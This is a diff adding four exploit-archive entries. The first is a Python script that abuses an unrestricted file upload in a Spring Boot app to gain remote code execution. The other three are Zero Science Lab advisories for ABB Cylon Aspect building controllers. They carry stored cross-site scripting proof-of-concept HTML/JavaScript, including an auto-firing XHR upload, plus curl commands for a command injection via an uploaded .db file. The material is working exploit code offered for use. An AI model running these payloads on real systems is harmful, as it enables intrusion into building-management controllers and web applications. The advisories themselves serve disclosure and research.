CERTCC
diff --git a/‎exploits/java/webapps/52206.py‎
Lines changed: 96 additions & 0 deletions b/‎exploits/java/webapps/52206.py‎
Lines changed: 96 additions & 0 deletions
diff --git a/‎exploits/multiple/hardware/52214.txt‎
Lines changed: 85 additions & 0 deletions b/‎exploits/multiple/hardware/52214.txt‎
Lines changed: 85 additions & 0 deletions
diff --git a/‎exploits/multiple/hardware/52215.txt‎
Lines changed: 115 additions & 0 deletions b/‎exploits/multiple/hardware/52215.txt‎
Lines changed: 115 additions & 0 deletions
diff --git a/‎exploits/multiple/hardware/52216.txt‎
Lines changed: 86 additions & 0 deletions b/‎exploits/multiple/hardware/52216.txt‎
Lines changed: 86 additions & 0 deletions
@@ -0,0 +1,96 @@
+# Exploit Title: Unrestricted File Upload
+# Google Dork:
+# Date: 14/Nov/2024
+# Exploit Author: d3sca
+# Vendor Homepage:
+https://github.com/OsamaTaher/Java-springboot-codebase
+# Software Link:
+https://github.com/OsamaTaher/Java-springboot-codebase
+# Version: [app version] 0.1
+# Tested on: Debian Linux
+# CVE : CVE-2024-52302
+
+
+# Steps to Reproduce:
+
+# Upload Malicious File: Send a PUT request to /api/v1/customer/profile-picture using customer with role 26,17 added with a malicious file payload (e.g., .jsp, .php, .html).
+
+# GET the file location: Send GET request /api/v1/customer/my-profile , grap the file location in response with the profile's link.
+
+# Execute the Uploaded File: Using the file name access the file directly through the URL returned in the response.
+# If the server supports the uploaded file type, it will execute the file, leading to Remote Code Execution.
+
+
+import requests
+import argparse
+import sys
+
+
+requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)
+
+def login(url, username, password):
+    """Authenticate with the API and return the Bearer token."""
+    login_endpoint = f"{url}/api/v1/user/login"
+    headers = {"Content-Type": "application/json"}
+    payload = {
+        "username": username,
+        "password": password
+    }
+
+    try:
+        response = requests.post(login_endpoint, json=payload, headers=headers, verify=False)
+        response.raise_for_status()
+
+        # Extract token
+        token = response.json().get("token")
+        if not token:
+            print("[!] Token not found in response. Exiting.")
+            sys.exit(1)
+
+        print("[+] Authentication successful. Token acquired.")
+        return token
+    except Exception as e:
+        print(f"[!] Login failed: {e}")
+        sys.exit(1)
+
+def upload_file(url, token, file_path):
+    """Upload a file to the profile picture endpoint using the Bearer token."""
+    upload_endpoint = f"{url}/api/v1/customer/profile-picture"
+    headers = {
+        "Authorization": f"Bearer {token}"
+    }
+    files = {
+        "file": open(file_path, "rb")
+    }
+
+    try:
+        response = requests.post(upload_endpoint, headers=headers, files=files, verify=False)
+        response.raise_for_status()
+
+        if response.status_code == 200:
+            print("[+] File uploaded successfully.")
+            print(f"[+] Response: {response.text}")
+        else:
+            print(f"[!] Failed to upload file. Status code: {response.status_code}")
+            print(f"[!] Response: {response.text}")
+    except Exception as e:
+        print(f"[!] File upload failed: {e}")
+        sys.exit(1)
+
+def main():
+    parser = argparse.ArgumentParser(description="Exploit script for unrestricted file upload vulnerability.")
+    parser.add_argument("-u", "--username", required=True, help="Username for login")
+    parser.add_argument("-p", "--password", required=True, help="Password for login")
+    parser.add_argument("-f", "--file", required=True, help="File to upload")
+    parser.add_argument("-url", "--url", required=True, help="Base URL of the target application (e.g., https://target.com)")
+
+    args = parser.parse_args()
+
+    # Authenticate
+    token = login(args.url, args.username, args.password)
+
+    # Upload the file
+    upload_file(args.url, token, args.file)
+
+if __name__ == "__main__":
+    main()
@@ -0,0 +1,85 @@
+ABB Cylon Aspect 3.08.02 (licenseServerUpdate.php) Stored Cross-Site Scripting
+Vendor: ABB Ltd.
+Product web page: https://www.global.abb
+Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+                  Firmware: <=3.08.02
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB BMS/BAS controller suffers from an authenticated stored cross-site
+scripting vulnerability. Input passed to the 'host' POST parameter is not
+properly sanitised before being returned to the user. This can be exploited
+to execute arbitrary HTML/JS code in a user's browser session in context of
+an affected site.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+           GNU/Linux 3.10.0 (x86_64)
+           GNU/Linux 2.6.32 (x86_64)
+           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+           PHP/7.3.11
+           PHP/5.6.30
+           PHP/5.4.16
+           PHP/4.4.8
+           PHP/5.3.3
+           AspectFT Automation Application Server
+           lighttpd/1.4.32
+           lighttpd/1.4.18
+           Apache/2.2.15 (CentOS)
+           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+           ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2025-5906
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5906.php
+CVE ID: CVE-2024-6516
+CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516
+
+
+21.04.2024
+
+-->
+
+
+
+                 P   R   O   J   E   C   T
+
+                        .|
+                        | |
+                        |'|            ._____
+                ___    |  |            |.   |' .---"|
+        _    .-'   '-. |  |     .--'|  ||   | _|    |
+     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
+     |' | |.    |    ||       | |   |  |    ||      |
+ ____|  '-'     '    ""       '-'   '-.'    '`      |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+<body>
+  <form action="http://192.168.73.31/licenseServerUpdate.php" method="post">
+    <input type="hidden" name="licenseServer" value="Server" />
+    <input type="hidden" name="host" value="'><script>confirm(document.domain)</script>" />
+    <input type="submit" value="Submit" />
+  </form>
+</body>
+</html>
@@ -0,0 +1,115 @@
+ABB Cylon Aspect 3.08.02 (licenseUpload.php) Stored Cross-Site Scripting
+Vendor: ABB Ltd.
+Product web page: https://www.global.abb
+Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+                  Firmware: <=3.08.02
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
+stored cross-site scripting (XSS) vulnerability. This can be exploited by
+uploading a malicious .txt file containing an XSS payload, which is stored
+on the server and served back to users. Although the filename is sanitized
+via the filename POST parameter, the file contents are not inspected or
+sanitized, allowing attackers to inject arbitrary client-side scripts that
+execute in the context of any user accessing the infected file or related
+web page (license.php). To bypass file upload checks, the request must include
+the Variant string enabling the upload process for potential exploitation.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+           GNU/Linux 3.10.0 (x86_64)
+           GNU/Linux 2.6.32 (x86_64)
+           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+           PHP/7.3.11
+           PHP/5.6.30
+           PHP/5.4.16
+           PHP/4.4.8
+           PHP/5.3.3
+           AspectFT Automation Application Server
+           lighttpd/1.4.32
+           lighttpd/1.4.18
+           Apache/2.2.15 (CentOS)
+           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+           ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2025-5905
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5905.php
+CVE ID: CVE-2024-6516
+CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-6516
+
+
+21.04.2024
+
+-->
+
+
+
+                 P   R   O   J   E   C   T
+
+                        .|
+                        | |
+                        |'|            ._____
+                ___    |  |            |.   |' .---"|
+        _    .-'   '-. |  |     .--'|  ||   | _|    |
+     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
+     |' | |.    |    ||       | |   |  |    ||      |
+ ____|  '-'     '    ""       '-'   '-.'    '`      |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+<html>
+  <body>
+    <script>
+      function storeit()
+      {
+        var xhr = new XMLHttpRequest();
+        xhr.open("POST", "http:\/\/192.168.73.31\/licenseUpload.php", true);
+        xhr.setRequestHeader("Accept-Language", "mk-MK,mk;q=0.7");
+        xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundarymcNoKljWbBWAldlr");
+        xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/avif,image\/webp,image\/apng,*\/*;q=0.8,application\/signed-exchange;v=b3;q=0.7");
+        xhr.withCredentials = true;
+        var body = "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
+          "Content-Disposition: form-data; name=\"userfile\"; filename=\"test.txt\"\r\n" +
+          "Content-Type: text/lic\r\n" +
+          "\r\n" +
+          "Variant = AspectMAX\r\n" +
+          "\x3cscript\x3econfirm(251)\x3c/script\x3e\r\n" +
+          "------WebKitFormBoundarymcNoKljWbBWAldlr\r\n" +
+          "Content-Disposition: form-data; name=\"submit\"\r\n" +
+          "\r\n" +
+          "Upload\r\n" +
+          "------WebKitFormBoundarymcNoKljWbBWAldlr--\r\n";
+        var aBody = new Uint8Array(body.length);
+        for (var i = 0; i < aBody.length; i++)
+          aBody[i] = body.charCodeAt(i);
+        xhr.send(new Blob([aBody]));
+      }
+      storeit();
+    </script>
+    <form action="#">
+      <input type="button" value="Post" onclick="storeit();" />
+    </form>
+  </body>
+</html>
@@ -0,0 +1,86 @@
+ABB Cylon Aspect 3.08.02 (uploadDb.php)  - Remote Code Execution
+
+
+Vendor: ABB Ltd.
+Product web page: https://www.global.abb
+Affected version: NEXUS Series, MATRIX-2 Series, ASPECT-Enterprise, ASPECT-Studio
+                  Firmware: <=3.08.02
+
+Summary: ASPECT is an award-winning scalable building energy management
+and control solution designed to allow users seamless access to their
+building data through standard building protocols including smart devices.
+
+Desc: The ABB Cylon Aspect BMS/BAS controller suffers from an authenticated
+OS command injection vulnerability. This can be exploited to inject and execute
+arbitrary shell commands through the contents of an uploaded .db file, which
+is passed to the copyFile.sh script. Although the filename is sanitized, the
+contents of the .db file are not, allowing attackers to inject malicious commands
+that are executed on the server.
+
+Tested on: GNU/Linux 3.15.10 (armv7l)
+           GNU/Linux 3.10.0 (x86_64)
+           GNU/Linux 2.6.32 (x86_64)
+           Intel(R) Atom(TM) Processor E3930 @ 1.30GHz
+           Intel(R) Xeon(R) Silver 4208 CPU @ 2.10GHz
+           PHP/7.3.11
+           PHP/5.6.30
+           PHP/5.4.16
+           PHP/4.4.8
+           PHP/5.3.3
+           AspectFT Automation Application Server
+           lighttpd/1.4.32
+           lighttpd/1.4.18
+           Apache/2.2.15 (CentOS)
+           OpenJDK Runtime Environment (rhel-2.6.22.1.-x86_64)
+           OpenJDK 64-Bit Server VM (build 24.261-b02, mixed mode)
+           ErgoTech MIX Deployment Server 2.0.0
+
+
+Vulnerability discovered by Gjoko 'LiquidWorm' Krstic
+                            @zeroscience
+
+
+Advisory ID: ZSL-2025-5904
+Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2025-5904.php
+CVE ID: CVE-2024-48839
+CVE URL: CVE URL: https://www.cve.org/CVERecord?id=CVE-2024-48839
+
+
+21.04.2024
+
+--
+
+
+$ cat project
+
+                 P   R   O   J   E   C   T
+
+                        .|
+                        | |
+                        |'|            ._____
+                ___    |  |            |.   |' .---"|
+        _    .-'   '-. |  |     .--'|  ||   | _|    |
+     .-'|  _.|  |    ||   '-__  |   |  |    ||      |
+     |' | |.    |    ||       | |   |  |    ||      |
+ ____|  '-'     '    ""       '-'   '-.'    '`      |____
+░▒▓███████▓▒░░▒▓███████▓▒░ ░▒▓██████▓▒░░▒▓█▓▒░▒▓███████▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓███████▓▒░░▒▓████████▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+░▒▓███████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓████████▓▒░▒▓██████▓▒░ ░▒▓██████▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░░░░░░
+         ░▒▓██████▓▒░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒▒▓███▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░▒▓█▓▒░░▒▓█▓▒░▒▓█▓▒░░▒▓█▓▒░
+         ░▒▓█▓▒░░░░░░░░▒▓██████▓▒░ ░▒▓██████▓▒░
+
+
+$ curl -s http://192.168.73.31/uploadDb.php \
+> -H "Cookie: PHPSESSID=xxx" \
+> -F "userfile=@testingus.db"
+
+$ curl http://192.168.73.31/database/testingus.db